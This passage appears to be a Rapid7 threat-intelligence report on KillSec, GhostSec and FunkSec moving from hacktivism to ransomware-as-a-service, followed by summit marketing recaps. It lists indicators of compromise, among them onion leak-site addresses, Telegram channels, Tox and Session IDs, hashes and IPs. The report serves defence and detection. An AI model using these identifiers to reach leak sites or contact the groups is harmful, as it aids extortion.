Although in certain incidents, KillSec leveraged solely stolen data to extort the victims, the group appears to adopt mainly double extortion tactics, exfiltrating data in addition to encrypting it and demanding a ransom payment to prevent it from being leaked. The group operates an active dedicated leak site (DLS) to which it uploads the data of victims who refuse to pay the ransom. The group also uses its DLS to advertise its services, which include penetration testing, data gathering, and its RaaS program (Figure 8).

It should be noted that KillSec’s DLS also features a “For Sale” section, offering data allegedly exfiltrated from the targeted companies for sale, with the prices ranging between $5,000 and $350,000 (Figure 9). The group likely introduced this section in an attempt to further monetize the exfiltrated data. This offering of stolen data and additional services further suggests the financially motivated nature of the group’s activity.

GhostSec

The GhostSec hacktivist group (AKA Ghost Security, GhostSecMafia, and GSM) has been active since at least 2015. The Anonymous-affiliated group gained prominence with the #OpIsis and #OpParis​​ campaigns, in which various hacktivist groups took down thousands of ISIS websites and social media accounts using defacement and DDoS attacks. Since then, GhostSec has participated in campaigns, such as #OpLebanon, #OpNigeria, #OpMyanmar, #OpEcuador, and #OpColombia. The group has also continuously launched cyberattacks on Israel in response to alleged war crimes, primarily defacing their websites to spread “Free Palestine” messages.

GhostSec’s shift towards financially motivated operations overlaps with the group’s collaboration with cybercriminals. In July 2023, GhostSec announced that they formed a partnership with the Stormous ransomware group to target organizations in Cuba (Figure 10). Following this announcement, Stormous and GhostSec jointly claimed extortion attacks against three Cuban government ministries, and GhostSec also expressed the potential for future joint operations against other countries. In August 2023, GhostSec, together with ThreatSec, Stormous, Blackforums, and SiegedSec, collectively formed a unified collective, naming themselves “The Five Families” (Figure 11). This collective attempted to extort the presidential website of Cuba and the Brazilian organization Alfa Comercial.

GhostSec solidified its presence in the cybercriminal ecosystem with the launch of its RaaS program “GhostLocker” in October 2023, which was shortly followed by the release of its infostealer tool, GhostStealer (Figure 12). In January 2024, the updated “REWRITE” (aka GhostLocker 2.0) version of GhostLocker was released, with a fully featured management panel allowing affiliates to track campaigns and payouts. The threat actor promoted its malware-as-a-service (MaaS) tools heavily on its Telegram channels, demonstrating its intention to attract affiliates and, in turn, maximize its profits.

On May 15, 2024, GhostSec announced its retirement from cybercriminal activities and its return to hacktivism. The group stated that it reached this decision after having obtained enough funding to support its hacktivist operations. GhostSec further mentioned that Stormous would remain in charge of the management and operation of GhostLocker (Figure 13).

It should be noted that Stormous seemingly had already incorporated GhostLocker into its operations, even before GhostSec’s retirement. As of May 2025, the group is still active and operates the Stormous RaaS program, which appears to be a continuation of GhostLocker. This development signifies the mutual assistance and influence among united threat groups, as collectives like the Five Families allow them to maximize the impact and breadth of their operations by sharing resources, audience, and knowledge.

Two sides of the same coin?

This analysis shows that the threat actors in scope, FunkSec, KillSec, and GhostSec, have followed a similar trajectory, pivoting from politically motivated, disruptive campaigns to financial extortion. This transition is likely facilitated by the public availability of leaked ransomware builders, such as LockBit 3.0, which threat actors can leverage to develop their payloads.

The groups specifically appear to have adopted double extortion tactics, exfiltrating data from their victims and then encrypting it, in an attempt to pressure them to comply with their ransom demands. However, despite their seeming ability to conduct ransomware operations, these groups appear to lack the level of sophistication and specialization that characterize top-tier cybercriminal groups, such as Cl0p and LockBit, which are mentioned in the Rapid7 Q1 2025 ransomware report.

Interestingly enough, all three groups embraced RaaS as their business model while pivoting towards cybercrime. This evolution is aligned with the overall current status of the ransomware ecosystem, as RaaS programs have become increasingly more common. Such programs, demonstrating the financial nature of their activities, enable threat actors to maximize their profits by allowing affiliates to use their ransomware kit for a fee and a percentage of the collected ransom.

This transition of FunkSec, KillSec, and GhostSec has also affected and amplified the victimology of their operations. While these groups once operated as hacktivists that primarily targeted government entities, their scope of activities broadened significantly as they shifted to ransomware attacks. Along this process, their attacks shifted from targeted to opportunistic, against organizations of different sizes, operating in diverse sectors and geographies, that could be relatively easily compromised.

While all of these groups follow the pattern, shifting from hacktivism to cybercrime, and specifically financially motivated RaaS operations, the reason behind this transition remains unclear. As an exception, GhostSec appears to have embraced cybercrime in an attempt to gather funding for its hacktivist operations, according to its exit message. It should be noted that other threat actors, such as CyberVolk, have also launched RaaS programs to fund their operations, but these efforts remain scarce.

Finally, other hacktivist groups, such as Ikaruz Red Team and their affiliates, also operate ransomware, but they do so to cause disruption and make political statements. Thus, the scope of their operations differs from financial gain and is not comparable to that of the groups included in this analysis.

Conclusion

The evolution of FunkSec, KillSec, and GhostSec from hacktivist collectives to RaaS operations highlights a recent trend of a shift in motivations, driving cybercriminal behavior. Initially, these groups were propelled by political and ideological aims, targeting governments and organizations in alignment with their perceived causes. However, over time, their focus has clearly shifted towards financial gain, as evidenced by their adoption of RaaS models that prioritize profit over ideology. As cybercriminals adapt to “market demands,” it becomes clear that financial motivation has come to dominate their activities, leaving behind the ideological roots of their earlier campaigns.

Indicators of compromise (IoCs)

FunkSec

• Darkweb DLS:
• funksec53xh7j5t6ysgwnaidj5vkh3aqajanplix533kwxdz3qrwugid[.]onion
• funksec7vgdojepkipvhfpul3bvsxzyxn66ogp7q4pptvujxtpyjttad[.]onion
• funksecsekgasgjqlzzkmcnutrrrafavpszijoilbd6z3dkbzvqu43id[.]onion
• Clearweb DLS: http://funksec[.]top
• Funkforum: http://funk4ph7igelwpgadmus4n4moyhh22cib723hllneen7g2qkklml4sqd[.]onion
• Session ID: 0538d726ae3cc264c1bd8e66c6c6fa366a3dfc589567944170001e6fdbea9efb3d

GhostSec

• Facebook: facebook.com/OfficialGhostSecGroup
• Instagram: instagram.com/ghostsecuritygroup
• LinkedIn: linkedin.com/in/ghostsecuritygroup
• Twitter: twitter.com/GhostSecGroup
• Vimeo: vimeo.com/ghostsecgroup
• Website: ghostsecuritygroup[.]com
• YouTube: https://www.youtube.com/channel/UCltlez3dwuV9_xZIi9LWNjA
• Telegram: https://t.me/GhostSecS
• SHA-256:

8b758ccdfbfa5ff3a0b67b2063c2397531cf0f7b3d278298da76528f443779e9

c9f71fc4f385a4469438ef053e208065431b123e676c17b65d84b6c69ef6748a

a1b468e9550f9960c5e60f7c52ca3c058de19d42eafa760b9d5282eb24b7c55f

3ecf05857d65f7bc58b547d023bde7cc521a82712b947c04ddf9d7d1645c0ce0

Stormous

• Telegram: https://t.me/StmXRaaSV4
• DLS: http://pdcizqzjitsgfcgqeyhuee5u6uki6zy5slzioinlhx6xjnsw25irdgqd[.]onion

KillSec

• DLS: http://ks5424y3wpr5zlug5c7i6svvxweinhbdcqcfnptkfcutrncfazzgz5id[.]onion
• Telegram channel: https://t.me/killsecc
• TOX ID: 9453686EAB63923D1C35C92DDE5E61A6534DD067B5448C1C8D996A460B92CA5055C1AB0FCD22
• Session ID:05cb94c52170c8119f7ebc2d8afc94b9746bc7c361d91c49e7d18e96e266582a07
• SHA256: 8cee3ec87a5728be17f838f526d7ef3a842ce8956fe101ed247a5eb1494c579d
• IP addresses: 82[.]147[.]84[.]98, 77[.]91[.]77[.]187, 93[.]123[.]39[.]65

Rapid7 customers

InsightIDR and Managed Detection and Response (MDR) customers have existing detection coverage through Rapid7's expansive library of detection rules. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to the FunkSec, KillSec, and GhostSec ransomware activity. We will also continue to iterate detections as new variants emerge, giving customers continuous detection without manual tuning:

Suspicious Process - Malicious Hash On Asset

While this specific detection directly covers malicious binaries linked to ransomware operations, customers also benefit from a comprehensive suite of detections that alert on post-exploitation behavior often observed prior to ransomware deployment. These include detections for lateral movement, privilege escalation, and suspicious persistence mechanisms, providing layered defense even when the specific ransomware payload is novel or obfuscated.

At the Take Command 2025 Virtual Cybersecurity Summit, a standout session titled Risk Revolution brought together Rapid7 product leaders and ESG analyst Tyler Shields to unpack the evolution of exposure management — and how organizations can build more context-driven, proactive risk strategies.

Hosted by Ryan Blanchard, Senior Manager, Product Marketing at Rapid7, the panel featured:

• Jane Man, Senior Director of Product Management, Rapid7
• Jamie Douglas, Specialist, Rapid7
• Tyler Shields, Principal Analyst, Risk and Vulnerability Management, ESG

Here are the key takeaways from the discussion, along with supporting insights from the post-event attendee survey.

From vulnerability management to exposure management

The session opened by distinguishing exposure management from traditional vulnerability management. Tyler Shields explained:

“Exposure management is the maturation of vulnerability management… It's understanding risk, business context, and prioritizing accordingly.”

Rather than focusing solely on patching, exposure management is about knowing what to fix, why it matters, and who owns it and doing it continuously.

Visibility gaps are slowing teams down

Visibility was a central theme throughout the session. Jane Man noted:

“A lot of the customers we talk to still struggle with just identifying what they have.”

This challenge was echoed in the post-event survey, where 53% of respondents cited identifying unknown assets as the top challenge in their exposure management programs.

Tyler added:

“You can’t protect what you don’t know about. And you certainly can’t prioritize it.”

Prioritization must be contextual

Prioritization remains a major hurdle for many organizations. Jamie Douglas stressed that severity alone isn’t enough:

“You can have a critical vulnerability on a printer, but if it’s segmented and not internet-facing, is it really a priority?”

The team emphasized the importance of integrating business impact, asset criticality, exploitability, and ownership into the prioritization process.

“If you don’t tie risk to business context, you’re just chasing numbers,” Tyler noted.

It’s time to break down silos

A powerful moment in the session came when the panel discussed collaboration across functions. Jane shared:

“Security doesn’t operate in a vacuum. You need buy-in from engineering, cloud, compliance - everyone has a role in risk reduction.”

Without shared language and unified dashboards, visibility doesn’t translate into action. The speakers urged teams to build bridges with IT and DevOps to ensure findings are actually resolved, not just reported.

Survey: risk prioritization is lagging behind

In the survey, only 18% of respondents said their organizations integrate threat intelligence into exposure management “very effectively”, highlighting a clear opportunity to improve how teams prioritize risk with real-time context.

This stat reinforces the panel’s broader message: that exposure management isn’t a point-in-time project — it’s a continuous, evolving practice.

Watch the full session on demand

For a deeper dive into the frameworks, real-world examples, and exposure strategies discussed in this session, watch Risk Revolution on demand.

Watch the Full Session

One of the most actionable sessions at the Take Command 2025 Virtual Cybersecurity Summit came directly from the field. In a panel hosted by Aniket Menon, VP of Product Management at Rapid7, security leaders from Cross Financial Corp, Phibro Animal Health Corporation, and Miltenyi Biotec shared how they’re evolving vulnerability management into a proactive exposure management strategy.

With real-world examples, team metrics, and shared challenges, the panel offered practical advice for teams ready to modernize their approach and reduce risk with more focus and confidence.

From VM to EM: A shift in mindset

Panelists agreed: traditional vulnerability management practices can’t keep up with today’s dynamic, hybrid environments. To stay ahead, security teams must shift toward continuous exposure assessment - building context around vulnerabilities and aligning efforts with business priorities.

As one attendee later shared in our post-event survey:

“Moving from vulnerability management to exposure management isn’t just a process change - it’s a mindset shift. It forces us to be more proactive.”

This takeaway aligns with broader findings from the summit survey, where 64% of respondents identified exposure management as a top priority for improving their detection and response strategies.

Prioritization requires business context

Volume isn’t the issue - context is. The panel emphasized that real risk reduction happens when teams align remediation priorities with asset value, exploitability, and operational relevance. That means:

• Building dashboards tailored for different stakeholders
• Connecting security and IT teams through shared language
• Using context to elevate urgency and drive action

You can’t fix what you can’t see

Despite tool investments, many organizations still struggle with asset discovery and visibility. In fact, 53% of survey respondents said identifying unknown assets is the most challenging part of exposure management.

As Edward Chang, Senior Manager of Cybersecurity and Compliance at Phibro Animal Health Corporation, explained during the panel:

“No one has 100% visibility. But if we can improve what we see and give that context to the right teams, we’re already ahead of where we were last year.”

The session encouraged using telemetry, automation, and unified data views to close gaps across environments.

Bridging the gap between security and operations

A recurring theme across the panel was the need for collaboration between security, infrastructure, and engineering teams. Effective exposure management doesn’t just rely on the right data — it depends on the right relationships.

Security teams must be integrated into how organizations build, deploy, and operate — not treated as a separate or downstream function. Building that alignment means treating security as an enabler, not a roadblock.

Ownership, accountability, and human risk

Beyond technology, the session also addressed ownership and accountability. Security leaders must not only flag risk — they must clearly assign and communicate responsibility. As attack surfaces expand and teams diversify, the ability to coordinate across functions becomes even more critical.

Watch the full panel on demand

If you're looking to strengthen your vulnerability management program or build a more proactive exposure management strategy, this session offers a roadmap shaped by real-world experience.

Watch the Customer Panel On Demand

The Take Command 2025 Virtual Cybersecurity Summit wasn’t just about sharing insights, it was about listening. After the live sessions wrapped, we surveyed attendees to understand where their security programs stand today, what challenges they’re facing, and what they found most valuable during the event.

Now, we’re excited to share those insights in a new downloadable infographic - The Take Command: Pulse of the Industry Survey, capturing the state of exposure management, AI adoption, MDR maturity, and more.

Here are a few standout takeaways from the survey, and where to dive deeper in the sessions on demand.

Exposure management: confidence is growing — but challenges remain

80% of respondents said they have confidence in their ability to respond to cyber risks through their exposure management program, and 60% reported successful integration of EM into their broader security workflows.

But the day-of survey showed a more nuanced reality. More than half of respondents cited “identifying unknown assets” and “monitoring third-party risk” as the top challenges in their exposure programs.

To explore solutions and strategies, check out Risk Revolution: Proactive Strategies for Exposure Management.

MDR adoption is strong — but visibility still needs work

58% of respondents rated their detection and response capabilities at 4 or 5 out of 5, and most teams using MDR cited a need for 24/7 monitoring and support for under-resourced teams. But 21% rated their confidence at 3 or below, indicating that making the right choice in MDR partner is critical.

In sessions like Inside the SOC and Demystifying Cloud Detection & Response, Rapid7’s teams shared real-world threat hunting stories and cloud-centric detection tactics to help close the gap.

Generative AI is a double-edged sword

Generative AI was one of the most discussed topics across the day — and for good reason. 50% of respondents said they were “very” or “extremely concerned” about adversaries using AI to enhance cyber attacks. Yet 36% of respondents say they’re not currently using Generative AI in their own security operations, citing barriers like tool integration, cost, and lack of skilled personnel.

For those navigating this space, AI in Action and Rise of the Machines both delivered practical examples of how teams are using AI responsibly to improve triage, detection, and response — while setting the necessary guardrails for safe adoption.

What attendees found most valuable

Take Command 2025 drew more than 2,200 live attendees, with on-demand views continuing to grow — and the feedback was clear: the content delivered. 67% of survey respondents rated the speakers as “Excellent”, with similarly high marks for session content and delivery.

When asked about their biggest takeaways, attendees consistently highlighted:

• Exposure management and risk visibility are key
• SOC operations and real-world case studies
• AI’s role in transforming security strategy
• The importance of “thinking like a hacker” to improve defenses

Attendees also appreciated the balance of voices, with one noting:

“Good mix of internal and external resources that knew what they were talking about and how to deliver it to a wide audience.”

Another shared:

“I didn’t think Rapid7 could improve its ability to unify information — but the new Exposure Command solution has done just that.”

From the depth of expertise to the variety of session formats, the summit resonated with attendees across roles, regions, and industries.

Explore the full infographic

Want a deeper dive into the data? Download the full Take Command: Pulse of the Industry Survey infographic to explore:

• Where teams are seeing success with exposure management
• How GenAI is being used (or not) across security operations
• What MDR teams are prioritizing — and what’s holding them back
• The biggest technical and strategic challenges security leaders face in 2025

[Download the infographic]

Catch up or rewatch: all sessions on demand

Whether you missed the live event or want to explore specific topics in more detail, every session from Take Command 2025 is now available to watch on demand.